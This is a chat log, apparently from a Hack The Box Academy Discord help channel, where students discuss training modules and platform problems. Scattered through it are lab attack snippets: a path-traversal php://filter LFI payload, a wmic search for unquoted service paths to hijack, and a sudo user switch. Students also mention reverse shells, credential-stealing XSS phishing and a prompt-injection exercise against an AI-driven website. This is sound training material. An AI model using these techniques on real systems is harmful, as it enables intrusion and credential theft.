From user1, I was able to switch to user2 using sudo:

sudo -u user2 /bin/bash

So I currently have access as user2 on the system.

As user2, I checked:

  • sudo privileges (user2 is not in sudoers)
  • SUID binaries
  • writable files
  • cron jobs
  • configuration files

However, I could not find any obvious privilege escalation vector.

At this point I am stuck as user2 and unable to escalate to root to read /root/flag.txt.

I would really appreciate either a solution or a clear explanation of the intended method so I can understand the concept properly.

Thank you very much.

wintry pagoda
#

is the academy platform slow for you guys ?

nimble plume
#

Yes

narrow plume
analog oasis
#

uhm, idk what place i can ask for this in, but the new UI for the academy made copying snippets from the sections for note taking very awful, especially when copying text that has like highlights or links. The alignment is bad and there is annoying padding at the beginning and end.

short citrus
#

Hello guys l am new to hack the box need help in which tools to use to complete linux fundamental task question on mobile phone

acoustic owl
short citrus
#

Thanks for correcting me l appreciate

nimble plume
#

Good thing I have a pentesting exam tomorrow, academy pretty unusable today

#

-_-

short citrus
#

Good luck bro

marble quiver
rain wyvern
#

i can not load academy module, wtf

#

next day is my expired subscription day, wtf ?

solid forge
#

in Attacking Common Applications - Skills Assessment II

the last question: Obtain reverse shell access on the target and submit the contents of the flag.txt file.

i managed to get a reverse shell, now do I need to priv esc? to find the flag?

red lily
#

Here to complain about "Setting up" Module.
Im either way out of my league or it's meant to be scrolled thru idk send help

solid forge
#

doesnt exist broski

#

i presumed it's in the root dir

rain wyvern
#

ok so let do PE bro

#

first try with sudo -l or using linpeas šŸ˜„

solid forge
#

but it's cwes

rain wyvern
#

oh i am doing cwes too, about 80%, maybe i will reach you the next day

#

but if you use the command to find flag but can not get it, i guess it was hiding or you dont have permission

#

try PE i think

solid forge
#

i dont htink so

rain wyvern
#

mine

#

i still can not access to the academy šŸ™ , i will check it

radiant jolt
#

Is it just me, or the academy is really slow?

solid forge
rain wyvern
#

submit the flag and is its hanging ....

radiant jolt
#

be me
play wow for one week straight
Get motivated to study
HTB is loading slow and submitting flag is hanging
Go back to wow
better luck next time

safe dock
#

Guys in attacking common services .

  • Smb dictionary attack.
    I have the password file and the username, I used nxc for dictionary attack but failed.
rain wyvern
arctic hazel
#

what I really dislike after the page revamp is that I cannot open an earlier chapter in another tab now

#

so annyoing

rain wyvern
#

facing the same issue, so bad UX design

solid forge
rain wyvern
#

need to PE or not bro?

solid forge
#

nope

rain wyvern
#

ok let me try @@

foggy crow
#

hello. can someone help me with module Wi-Fi Password Cracking Techniques, section Mask Attacks? i have no idea for question one. i think the only solution is -1 ?d?s -2 ?d?s ?s?a?u?a?d?1?2, yet they want answer in ?x?x?x?x?x?x?x?x format. how is that possible? the question was "What would the mask look like if the password is 8 characters long, where the first character is a special character, the third is an uppercase letter, the fifth is a digit, the last two are either digits or special characters, and the remaining characters are lowercase ASCII letters? (Format: ?x?x?x?x?x?x?x?x)"

fresh ingot
#

@oblique plume did you already manage to capture the flag?
I only managed to retrieve te flag via:
-connect to the open network
-navigate in a browser to captive.htb.local and observe captive portal
-do nmap ping sweep on the subnet you are a part of
-change MACaddr, to the one found in the ping sweep DO NOT CHANGE IP / DEFAULT GATEWAY
-refresh the browser with captive portal to reveal flag

I strongly believe the theory on this section to be incorrect/incomplete, or the lab to be broken.
the moment you start to follow the last part of the theory section to spoof IP and configure default gateway, everything breaks:
i.e. you are no longer connected to the network, and can't reconnect anymore. The captive portal is unreachable

inland python
#

I'm trying to set up a Proxmox virtualization but all I get is a black screen

#

(this is after pressing install graphical interface)

molten swallow
#

Hello guys. Is that a good practice to reduce threads while fuzzing through SSRF? Server in Serv-Side attacks module dies all the time if im trying to ffuf with 10+

quasi wave
#

for the Information Gathering - Web Edition Module's skills assessment, I am working on question 3. I have already solved questions 1, 2, 4, and 5

#

so what I am trying to do is use curl -I to get the robots.txt file or whois to find hidden API key

#

but it hasn't worked no matter how I try to do it

#

can someone help me out here?

#

I already have the subdomain within the subdomian

#

I tried to get robots.txt, sitemap.xml, and .admin, and security.txt

#

haven't been able to confirm any of those

fathom pendant
quasi wave
#

I am scared I am gonna get penalized for spoiling stuff

late shuttle
#

Can I get a DM for the footprinting hard lab on academy? Pretty stuck

#

Nevermind I'm a dumbass, got it

winged bane
#

im so confused on this module, I have a valid pfx, but the gettgt isnt working even though every writeup I see, it works fine. I've restarted the machine and my machine 3 times lol

#

"KDC has no support for PADATA type (pre-authentication data)" is all im getting

winged bane
#

Pass the Certificate module

winged bane
#

oh I see, thank God, I really thought I was just stupid this whole time lol

brave field
#

The HTB team is working on a fix

winged bane
#

thanks for the heads up

tall fern
#

Hello any help for Probing the Surface on Introduction to C2 Operation with Sliver?

desert narwhal
#

Can somebody help me with Q4 of Windows Lateral Movement? I am currently inside a ||PSSession as Arturo|| and I'm struggling to find the ||password of Rossy||.

median relic
#

Hello,
did anyone recently the crackmapexec module? I'm at the password-spraying chapter and enumerated the answers to the questions, but it always says wrong answer when I submit the specific account.
It looks like that no username is correct as answer from the chapter. I also tried domain/user but this even didnt work. Did I overlooked something?

jaunty niche
#

Can anyone please help me

vocal schooner
#

Is there any issue with academy ? i can't start the target machine

limpid pollen
#

According to wikipedia.com snapshot taken on February 9, 2003, how many articles were they already working on in the English version? Answer with the number they state without any commas, e.g., 100000, not 100,000.

need help please...every answer i've researched or AI has given me is wrongšŸ˜‚ 😭

steady plank
west rampart
#

Which module?

torpid inlet
#

Hi, could anyone help me with Skills Assessment - File Inclusion. I have tried multiple ways but a number of things don’t make sense here. For instance:

  1. Why do php://filters not give any output when I'm using them with curl but work flawlessly with BurpSuite?
  2. In this, when I use the filter php://filter/read=convert.base64-encode/resource=....//....//....//....//....//....//contact.php I should get response in Base64 that I'd then have to decode but the response here is plain text.
  3. Is there no way I could check what files and folders are available?

I would really appreciate some help here coz I have been going at it since this morning and it's driving me crazy

steady plank
cloud forum
lost vessel
#

Active Directory Enumeration & Attacks - Bleeding Edge Vulnerabilities
The target is not spawning up on multiple attempts even after re-login. Is it a general problem?

manic junco
#

any can help me, i can't spawn my target

steel snow
#

me neither

#

@manic junco @lost vessel it seems to be fixed

west rampart
#

Which exact Section?

vocal schooner
#

ESC 10

west rampart
#

Can you send me the section link?

vernal hamlet
#

guys does this mean i have 3 streak savers in hackthebox academy ?

summer stone
warm horizon
#

Good morning my friends, sorry to bother you, but I need some help. I'm in the Cross-Site Scripting (XSS) module on the phishing page. I did everything correctly, but the bot accesses the login but doesn't send the credentials to me. Could someone please give me a hint?

vocal schooner
willow sky
#

hi i star lerning htbx and i tryng to do this
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
I try this curl -s https://www.inlanefreight.com/ | grep -oP 'https://www/.inlanefreight/.com//K[%5E"'/''< >]+' | sort -u | wc -l but i cant someone have idea why not

heavy sluice
steel snow
#

GAHHHHHHHHHHHHHHHHHh

#

I HAVE BEEN STUCK ON ONE QUESTION IN AN ASSESSMENT

#

I DID THE LAST QUESTION

#

BUT THE MIDDLE QUSTION I AM STUCK

#

I CAN'T FIND A CLEAR PASSWORD

#

I HAVE BEEN ONGOING SEARCHING FOR 4 DAYS NOW

#

it's the first assessment in the attacks on ActiveDirectory

boreal basalt
#

Hi guys, I am on a box (logging), while learning with the modules of the academy.

But I don't understand how to search cve like with linux.

I have the version and the build, but i don't where to search for vulns.

fathom pendant
hidden ledge
boreal basalt
quasi wave
#

completed the information gathering web edition module

#

was good

#

third question was the hardest by far

#

anyway, now I'm doing web fuzzing

steel snow
#

because this is kinda the first module for me other than password attacks talking about password loots

fathom pendant
#

whenever you gain access to a new system or user, enumerate.

steel snow
#

i did full enumerations

#

that was used in the module

fathom pendant
#

if you did then you wouldn't be stuck šŸ˜‰

glad frost
#

Hi everyone, I'm stuck on the following question:

Module name: Prompt Injection Attacks
Section Name: Skills Assessment
Link: https://academy.hackthebox.com/app/module/297/section/3421
Question: Obtain the flag by getting the CEO banned from their own website.

I've banned the CEO successfully and I can confirm it by logging in but I really don't understand from where I should obtain the flag. I would appreciate any tips. Thanks in advance!

steel snow
#

i acually went beyond in enumeration, but still =_= i am pretty sure anything (unless wasn't discussed how to execute in the module or prev modules) was done by me

#

i still don't want to get the answer on a silver plate. i can search online too for password loots

#

i just want to make sure it wasn't among the ones in the module

hidden ledge
steel snow
#

hmmmm i went back in password attack modules

#

not completely

#

i created a script to try all 4 words list But ahhh

#

i will check then

hidden ledge
#

Think about the privilege you have

steel snow
#

i don't think i should talk about it here since i was told in skill assessments it shouldn't be exposed here!

hidden ledge
#

You can dm if you want to be more explicit

rigid acorn
sly wave
#

Yes, it is.

#

The different paths overlap each other quite a bit, as well. They are more curated collections of modules that cater to more specific interests / careers

#

So you'll notice that once you finish the JCA path, you'll actuall have completed 10-50% of another path in the process

rigid acorn
hard path
#

Documentation & Reporting Practice Lab

is it only me or is the rdp slow as hell

whole merlin
#

I am curious about something I am hoping someone from the academy staff could chime in.

I see all of these really cool and advnaced Tier IV DFIR, malware, and threat detection modules. Really up my alley, is all of this going to be available as a path of some sort under a yearly plan? As it is currently, if we use cubes, it is a $100 per course. I

cloud urchin
#

They can't and won't discuss upcoming paths like that

#

i would have to imagine more are coming though based on what they've shown already

#

a lot of the AI path was there before they finally announced the cert for example, so it wouldn't surprise me

formal stag
#

Evening all, Looking forsome help as im seriously stuck.

Attacking Authentication Mechanisms : Algorithm confusion.

follow the steps to the letter and I can't seem to get it working right. Cyberchef doesnt behave as described either

#

I cannot get a JWT to be signed correctly or be valid.

whole merlin
#

That sucks cuz just knowing I could kind of prepare my finances around it you know. I can either wait for a yearly plan or spend monthly on the cubes. The ai path was kind of confirmed as a job role path for a while though. Unsure about this.

#

I guess another way to frame my question would be, is there going to be a plan that covers tier 4 and all below modules?

gentle dove
#

Hey guy, I have a question on Setting Up section 5 Windows module. Should we install the PSWindowsUpdate module on VM or our host?

brave field
gentle dove
brave field
gentle dove
#

Do we have ways to rollback before we install the PSWindowsUpdate module?

silk geyser
#

Hello. I'm working with Intro to C2 Operations with Sliver -
Domain Reconnaissance
I can't answer Question 5
"Submit the external domain admin (username)"

There are 2 domains
I have no idea how to answer this question - are these people in the DOMAIN Admins group?
But there's a carrot and an administrator, and they don't fit.
BloodHound doesn't work

fallen arrow
#

On the previous design of the academy, under every module I could see which boxes from labs I could potentially solve for practice. Now this seems to be gone as I didn't find any suggestions under any module. Is that true?

mental canopy
mint oriole
#

Hi guys

silk geyser
ocean night
#

If you mean something on the module overview page itself, I'm not sure if that is going to be coming back, didn't know that was a thing

fallen arrow
# ocean night It's still there

I found it through the chat from support bot, but there is one thing I wish was present. The issue with that page is that the suggestions are very vague. Like, I want to see the boxes that would specifically test the knowledge covered from the room, but in stead if I go into the details of the boxes that were suggested to me, I am going to find like 5+ other modules that I am supposed to have covered.

fallen arrow
# ocean night It's still there

Even if that's ok by HTB Staff, then it would be better to recommend as a whole based on at least the modules I have covered all together and make the recommendation of machines more personalized

ocean night
#

Fair enough, we do welcome /feedback, which goes direct to the team if you felt like providing it šŸ™‚

fallen arrow
#

Because currently the recommendation is very abstract, the machine is recommended only because the module I have selected was part of it and not specifically revolving around it. And once again, I would prefer to see the machines that would also add up based on the sole modules I have covered and not extra (without my approval) to make the practice experience more personalized

#

I have to provided this feedback in a separate channel?

ocean night
#

It's a Discord command, it gets passed on to our internal channels for the teams to see and discuss

#

Using the command /feedback in Discord will open a modal that you can enter the above feedback in, copy / paste on that would probably be enough I suppose

fallen arrow
ocean night
#

Thank you, appreciate you taking the time to pass on feedback hugthebox

shut vapor
#

I kind of like the new XP tracking in Academy even if it came with more stringent requirements for reaching my weekly streak... no more popping a foundational module and next, next, nexting my week away when I'm feeling lazy.

daring sage
#

Hi guys i have a question about "Password Attack" module, "Spraying, Stuffing, and Defaults" section. if someone do this section's task, can help me?

shut vapor
#

or hang tight and I'm sure someone else could assist

heady tusk
leaden island
#

yo guys, im on win privesc module, weak permissions section.
i supposed to search for unquoted service binary paths, so i can trick it into loading a binary of mine.
the module uses this command to search for them: wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ however, when running it, the powershell terminal thinks that there is still a dequoted quote, ex shows: ```PS C:\Tools> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" | findstr /i /v """

#

also why do reverse shells/meterpreter shells dont work in that section

fathom pendant
#

I think they use '' not "

leaden island
#

thats the copy-paste command from the section:
C:\htb> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

#

what it should actually be though ?

fathom pendant
#

Likely '' or wrapping " in '' like so '"' or "'"

leaden island
#

still, cant yield non quoted binaries

leaden island
fathom pendant
leaden island
#

acknowledged 🫔

solid forge
scenic arrow
#

Hey gang! Working on "Attacking Enterprise Networks" module, and I'm stuck on SSRF. I'm able to exploit and view the passwd file, but having issues with enumerating folders. Or am I missing something?

hard furnace
#

Hello! I’m working on the skills assessment from the ā€œWi-Fi Evil Twin Attacksā€ module and I’m stuck on the final question. Could someone help me figure it out?

formal stag
#

Evening all, Looking for some help as im seriously stuck.

Attacking Authentication Mechanisms : Algorithm confusion.

follow the steps to the letter and I can't seem to get it working right. Cyberchef doesnt behave as described either
I cannot get a JWT to be signed correctly or be valid.

worthy terrace
#

Hello everyone, I having issues with the "Incident Handling Process" skills assessment question #1 "Open the alert "[InsightNexus] Admin Login via ManageEngine Web Console." Find the foreign IP address starting with "203" in the comments. Check VirusTotal for the information related to this IP address, and add the details as a comment in this alert. In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section?". I seem to follow the directions exactly and tried out some guides. But it seems the information they are getting on Virustotal is missing from the searches I've done. I've reset the target and Pwnbox and have tried waiting several days between tries. NOTHING. Can anyone help?

lyric hornet
#

In the Introduction to Windows Command Line "Finding Files and Directories" section, 2nd question:
"Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file."

Ive tried "where waldo.txt" to locate it, and I tried to brute force it via the tree command and couldnt find it. The where command doesnt give any output, even with existing files that ive tested on the host. Am i missing something?

prisma knot
#

In the stacking the deck > privileged access portion of AD Enumeration and Attacks, where do we find the creds needed to SSH to academy-ea-attack01?

summer stone
#

i am doing everything right but i cant get what the module is getting

fathom pendant
summer stone
fathom pendant
#

ah yeah

spark yacht
agile mountain
#

Please any hint on how to tackle the exercise of 'ColdFusion - Discovery & Enumeration' section of 'Attacking Common Applications" module. The question says ''What ColdFusion protocol runs on port 5500?"

agile mountain
somber sentinel
#

doesn't academy allow vpn log in? only pwnbox?

acoustic owl
agile mountain
white vale
agile mountain
calm abyss
#

Have you heard about Copy Fail exploit CVE-2026-31431 ?
It grants root by exploiting a flaw located in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface.

pastel aspen
#

Hello, on Module Blind Sqli, data extraction part, I managed to dump flag from database, string I got has good format (HTB{xxx}), but when I submit it it says wrong answer. Tried multiple time, added more delay time, but always I always receive the same flag from script. Am I missing something ?

high citrus
#

Hi, trying the Remote Access Attacks section on the Password Attacks Module, i've been stuck with 2 particular flag, the first one ||needs hydra to crack the password with 2 given list for user and password, but it seems to take a little while is it normal? est time is 2h, and 15 min have passed, the second flag is about the other section Remote Password Attacks, here i have a given user and password to access via ssh, and i should find credentials of Mysql, tho, as the module talks about password spraying and stuffing i tought the password was the same, but it isnt||